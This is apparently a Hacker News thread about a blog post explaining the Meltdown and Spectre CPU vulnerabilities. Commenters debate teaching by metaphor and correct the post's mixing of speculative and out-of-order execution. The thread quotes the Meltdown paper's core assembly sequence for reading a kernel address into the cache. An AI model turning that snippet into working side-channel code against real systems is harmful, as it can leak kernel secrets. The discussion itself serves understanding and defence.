https://meltdownattack.com/meltdown.pdf (start with this one)
They are extremely well written, clear and to the point. Understanding them will take you less time than trying to get rid of all the tortured analogies and unnecessary simplifications people have been trying to make up over the past week. It's bad enough that we face the daunting task of explaining this stuff to people who don't care about computers, there's no need to perpetuate misunderstanding among those who deal with computers for a living. Just read the real thing.
And on the subject of explaining this to others, it might surprise you how far you can get if you try to honestly explain how the attacks work. I refuse to use the silly train station metaphors, so I tried to describe the basic idea of how speculative execution works in out of order CPUs to my parents (who can browse the Internet, with some effort, and were patient enough to listen to me for 10 minutes or so). I don't think I got the notion of return-oriented programming across very well, but the basic idea of Meltdown and side channel timing attacks in general is actually very easy to convey on the basis of a reasonably simplified picture of a CPU - you need the explain the basic role of cache memory, virtual vs physical addressing, the TLB and the basic notion of branch prediction. That's all you need to understand the principle of how the attacks work, if not the details of the implementation.
Point is: keldaris is exactly right; please do read these papers -- and read them in the order of Meltdown before Spectre. If you completely understand the Meltdown paper, the Spectre paper will be much more accessible.
How did the author of the blog post perpetuate a misunderstanding? What is wrong with reading multiple sources and discussions on an a subject? Isn't that what we are doing here to some extent?
Because a definitive white paper was published this should be our only allowed source of understanding?
Its quite possible that someone could read this and then the more lengthy white paper and have them be complimentary. Not every programmer starts with the same level level or hardware and microarchitectural knowledge.
>"And on the subject of explaining this to others, it might surprise you how far you can get if you try to honestly explain how the attacks work."
Isn't this exactly what the author of this article did? In seeking to understand the problem hey formulated their understanding into a blog post.
It seems to me that's exactly what they did and there were no "tortured analogies" in this individuals blog post.
By misunderstanding the fundamentals of how Meltdown works - specifically, by confusing out-of-order execution with speculative execution, and then basing their explanation on that misunderstanding. My further explanation elsewhere in this thread: https://news.ycombinator.com/item?id=16133668
I might have less of an understanding about the real world implications until I look at the impacts, but people around me have been talking about it (at work, etc) and I realized they all had a pretty limited understanding of the vulnerability and how it worked (not because they aren't smart, they just didn't have time to read the actual paper and are more focused on how this affects us at work).
I want to make this a part of my normal routine, every week or so to pick an interesting, well written paper on a meaningful CS topic and have a leisurely, scholarly read like I used to do in school (well, in school there wasn't too much leisure to it).
Similarly, many folks explaining this are likely doing so as much to increase their understanding as anything else. If there are problems in their explanation, help make it clearer.
None of this is to say that folks should skip the originals. But it is also not helpful to constantly send folks back to them.
This isn't something unattainably complicated that you need years of education (on top of a typical CS education or its self-taught equivalent) to understand. I think it's worth pointing out to people that they shouldn't be afraid of reading the original material. And frankly, I've found many of the popular metaphors harder to understand than the papers.
And again, I'm just cautioning if you are offhandedly dismissing metaphor. Tone can be lost in forums, obviously, so don't think I am "correcting" you. I do not intend it that way.
It's one thing to use a metaphor to convey some essential property of a complex idea to non-experts. It's quite another to see domain experts argue about the (often non-trivial) details of strained metaphors far beyond their area of applicability. Without demeaning the usefulness of metaphors, I'm essentially trying arguing that: 1) domain experts should be far more cognizant of the limitations of the metaphors they employ and 2) domain experts should at the very least try to read the original material before perpetuating solely metaphor-based explanations.
I agree the shared metaphors of notation and common jargon should be preferred as a starting point. I just don't have faith that they are the clear way out of misunderstanding. More, I think it is unrealistic to think this is something that should only be done with "outsiders". Rather, I think we are all using some common language, and shaking up to new language can shake out misunderstandings that were simply not being voiced.
On the other end of the scale, there's a huge amount of popular documentaries out there that purport to say something about AdS/CFT. Most of them either contain nonsense or don't say very much at all. I don't really know how useful the popular analogies really are, but in the spirit of making at least one recommendation that doesn't contain any math, Susskind's public lectures are easy to watch (here's one ), and Susskind is careful not to talk nonsense.
There isn't really much on AdS/CFT that's in between graduate level mathematics and math-less popular stuff. The reason is that it's a fairly irreducible concept in the sense that you really need to understand what an anti-de Sitter space is and how conformal field theories work to see why there's a mathematical correspondence between them, and this isn't truly analogous to anything simpler. That's why it's very hard to explain beyond the level of vague metaphors without being rigorous about it.
That is, these folks are building these metaphors as their attempt to understand the issues. If they simply silently kept them to themselves, you wouldn't even know they needed them corrected. Be clear on this point, people think in these metaphors whether they are read to them or not. That you did not is a trait of you. Not a universal.
So, please correct them. And keep encouraging folks to go to the originals. But expect that not everyone can read them as clearly as you can. And use the evidence of the poor metaphors to confirm that. :)
Having the update at the post that says to read the original is vital. Getting more of the "peer review" mentality in all posts is also key, provided that people don't treat their posts as immutable and actually correct things that are in need of correcting.
I don't feel this is much different from any other pedagogical practice, though. How many of us come at "imaginary" numbers with a given metaphor that severely fails us in some understandings?
Once there's blood in the water, people race to find exploitable flaws (that's the goal of the game), and so it's not surprising that you'd get multiple teams disclosing, especially with something this egregious. Also: there's a Nyquist Frequency thing happening here: remember that we're dealing with months-long embargoes. So there's a lot of time for people to have found these bugs "separately", and all we're really seeing is a colliding disclosure.
But having said all that: straight-up collisions happen a lot. We all have favorite stories. My favorite is when Vitaly McLain (then at Matasano, now one of my partners at Latacora) found an nginx bug that was identical to Heartbleed, 2 years before Heartbleed was disclosed. A fantastic bug. We were on a client engagement, so we had to coordinate with the client before reporting it upstream, and in the one hour it took to do that, someone else reported the same bug.
I know you asked for specific citations, but I'd rather let someone who actually works in this area respond. I've read a few of the earlier articles on these subjects, but I'm not qualified to detail the full context surrounding the earlier research.
* The memory hierarchy (registers, cache, memory); really all programmers always need to know the memory hierarchy and Meltdown just sort of reinforces that.
* The basics of kernel memory management (kernel memory is mapped into userland processes and protected by page table permissions checks).
* Very basic assembly language (basically what a variable assignment and an "if" statement compile down to).
* The idea of pipelined CPUs, the idea that on modern CPUs the registers you see in assembly instructions are actually renamed from a larger invisible register file, and the distinction between instruction execution and retirement.
If you've got this I think you can just read the paper: https://meltdownattack.com/meltdown.pdf. It's really well written. In particular: I don't think you need to understand much about timing attacks. The Flush+Reload paper (you can just Google it, it'll be the first result) is also really well written, but you'll be fine in the Meltdown paper without having read it.
What they're detecting is whether a piece of memory is in the cache or not. This lets them infer the contents of some other piece of memory.
For example, an if-statement might check whether or not a secret bit is set, and that might lead the process to call function A or function B. By detecting whether it's A or B that lands in the instruction cache, you can infer the value of the secret bit.
The nice thing about Meltdown and Spectre is that the cache hits are less tricky to understand; they're engineered specifically to make the exploit work.
I guess part of what bothered me is what makes it well written; there is so much of the discussion spent on background, which felt like stating the obvious to me. It wasn't clear to me how specific the conditions needed to be for the attack. They use GnuPG as an example, and ostensibly rely on knowing the algorithms that the decryption and encryption functions beforehand. With knowledge of the implementation, they're able to trace execution, and subsequently infer each bit of the victim data that they want to probe. They also need to know the victim's cache characteristics; hierarchy and timing.
It's a far cry from arbitrarily reading memory on an arbitrary victim.
Or does this work only because the kernel exists in the same virtual address space, hence KPTI as a mitigation?
And you are right, KPTI is a full fix for Meltdown (but not Spectre).
32 bit machines do not typically have sufficient kernel address space to do the same.
(Oh, linux still uses direct map on 32 bit machines even today, but only maps some memory? I thought that was abandoned, but wouldn't really know. Anyway, a much better explanation of all things direct map is https://www.sceen.net/mapping-physical-memory-directly/)
I am curious what types of things does this simply for the kernel? When is a physical page allocation ever done that doesn't need to be entered in into a page table entry?
I wish I’d just read them in the first place. They aren’t that long and they aren’t that hard to follow. So I recommend developers read the original papers.
That said: after reading the papers trying to explain the issues to someone else will test your own understanding, so I don’t mean to dismiss what you’ve written.
Aside: I find “so you don’t have to” in the title to be a little off putting.
* I don't think Meltdown depends on eager (both-branch) speculative execution.
* Memory access during speculative execution almost has to work (and does on AMD and ARM), so that's not the problem. The problem is that permission checks on memory pages are done asynchronously on Intel, and may not abort execution until after footprints have been left in cache.
* You can't use memory writes to store the locations of transient memory reads because the instructions are transient, will never be retired, and so can't affect the architectural state (things overtly visible to programs). It's not that the CPU designers realized and specifically prevented that line of attack from working.
* It's not that cache state doesn't seem to be rolled back; it's that you can't roll it back. Modern computers are themselves small distributed systems. Changes on shared caches have to be coordinated. You'd be trading one race condition for another.
* Exception suppression isn't necessary for the attack because otherwise your process crashes. That's fine: you just run more processes. It might not be necessary to suppress exceptions at all, except that exception handling adds overhead and thus noise to your measurements. Also: the suppression technique you describe here is an oversimplification of Spectre; in reality, Meltdown deals with this with signal handlers or (probably better still) TSX.
Finally: I'd recommend not telling people to avoid the actual paper. Your summary is about as technical as Meltdown's is anyways. It's a great paper; more people should read it.
I think you are being overly gentle responding to this flaw in the explanation. Not only does the bug not depend on both-branch speculative execution, I don't think there even exist any x64 processors that do both-branch speculative execution.
I'm almost certain that all modern Intel x64 processors do branch-prediction and speculatively execute only the branch that they predict as most likely. If that guess is later proved wrong, they throw away the executed but not-yet-retired instructions and execute the correct path.
Am I wrong about this?
The article states different. If I'm right that would also require some specter-like attack to make sure the desired branch is actually executed speculatively. Alternatively, maybe you can catch the exception and use that to indicate the desired branch was run.
One of the biggest challenges describing low level systems vulnerabilites like these is you have to actually learn at least a little about the CPU internals and high level explanation only gets you so far. I think adding a "why this matters" to your post is helpful.
Planning to read the Spectre paper next week and do another blog post.
Edit: Just read your blog post, definitely need to add a "what's this about", and a "what you should do" section.
"The one which is being read is cached, and the exception will be raised much faster as a result."
I only read the project zero post, not the paper, but I don't recall it having anything to do with timing of exceptions. I don't see the point or relevance of this section.
Might be missing something.
Edit: mixed up Meltdown with Spectre, I'll take a closer look at this later
You run your moderately protected VM on a cloud provider? So do I. In fact, mine runs on the same hardware as yours ... Nice private key you had there...
And we haven't seen a real world binary version either. The versions I've seen all take running starts so to speak.
So how early does that chain of events have to be stopped? If it's stopped before the unwanted fetch, security is sound - the CPU never pulls in the data it shouldn't see. Future CPU designs are probably going to have to do that, even at some cost in performance (but look for complicated explanations from Intel as to why this isn't really necessary). That may require more permission info in the various tables and caches of the memory system.
Even if the memory interface looks at page permissions earlier, there's the possibility of using this attack to peek at data in the same address space, data protected only by checks in the code. This may allow snooping around within application programs such as browsers.
It used to be that you only worried about timing issues for speculative execution in crypto code. It's important that strong encryption code take constant time regardless of the data. Otherwise, timing measurements of known-plaintext attacks may yield info about the key. Now it's a broader problem.
Bleah. Fortunately, my CPU designer friends are all retired now and don't have to deal with this.
Somewhat related, is it possible to neuter the JS engines in Firefox or Chrome so that they don't JIT JS and would doing so have any real world impact on mitigating this attack? If it relies on speedy execution to be possible maybe a solution would be to have a NeuterScript extension that deliberately slows things down.
I think the point is that a JS based attack, while possible, would be much use outside proof of concept
"In practice, CPUs supporting out-of-order execution support running operations speculatively to the extent that the processor’s out-of-order logic processes instructions before the CPU is certain whether the instruction will be needed and committed. In this paper, we refer to speculative execution in a more restricted meaning, where it refers to an instruction sequence following a branch, and use the term out-of-order execution to refer to any way of getting an operation executed before the processor has committed the results of all prior instructions."
In this explanation, the author starts by showing two different code branches, which is misleading. Meltdown does not require code branches - which is what makes it so surprising. This is the C code example from the paper:
No branches: you have an exception, and then in the code following that exception, you have some memory access. Despite the exception, the access happens because of out-of-order execution. The actual exploit is, in assembly:
raise_exception(); // the line below is never reached access(probe_array[data * 4096]);
The exception is raised on the mov command, as it loads a kernel address. This exception will eventually cause the processor to abandon all of the current code it is executing, and the program will terminate from a segmentation fault. But. There is a race condition: before the processor deals with the exception, but after the memory has been accessed, the second mov instruction executes, which uses the data which caused the exception. This shouldn't matter, as execution is abandoned, but data is brought into the cache based on this value, and using side-channel attacks, we can figure out what this value was. From the paper:
; rcx = kernel address ; rbx = probe array retry: mov al, byte [rcx] shl rax, 0xc jz retry mov rbx, qword [rbx + rax]
"To load data from the main memory into a register, the data in the main memory is referenced using a virtual address. In parallel to translating a virtual address into a physical address, the CPU also checks the permission bits of the virtual address, i.e., whether this virtual address is user accessible or only accessible by the kernel. As already discussed in Section 2.2, this hardware-based isolation through a permission bit is considered secure and recommended by the hardware vendors. Hence, modern operating systems always map the entire kernel into the virtual address space of every user process.
As a consequence, all kernel addresses lead to a valid physical address when translating them, and the CPU can access the content of such addresses. The only difference to accessing a user space address is that the CPU raises an exception as the current permission level does not allow to access such an address. Hence, the user space cannot simply read the contents of such an address. However, Meltdown exploits the out-of-order execution of modern CPUs, which still executes instructions in the small time window between the illegal memory access and the raising of the exception."
I find the paper to be very readable. They give a good overview of modern computer architecture, and then walk through all of the steps of their attack. I highly recommend reading it: https://meltdownattack.com/meltdown.pdf
For others on this thread: +1 on the above recommendation for reading the paper itself. It is very well written and accessible. If you've read the blog post, you know pretty much everything you need to understand the paper.
And, to reiterate: any explanation of Meltdown that depends on branches is incorrect. It's not enough to just use the phrase "out-of-order". All of your examples with if-statements need to change.
But more important than the term is that the submitted description explains the Meltdown attack in terms of branch instructions, which is not how it works. A reader of the submitted description will come away with an incorrect understanding of what actually happens.
If you wrote a vm with a cpu simulation you would implement it as a branch.
That should be 256 bytes.
Should probably say "Intel" somewhere ;)
Was this simply a performance engineering trade off made by Intel? Would checking the PTE permissions on speculative execution result in giving up any performance gained by the speculative execution?
My new understanding is now that the concept of a process and isolation of processes is handled by the kernel.
This is probably a silly question, but maybe we could handle process isolation in the CPU somehow?
Basic Bayesian analysis suggests that there is more fruit to fall off the tree.
Nice read anyway.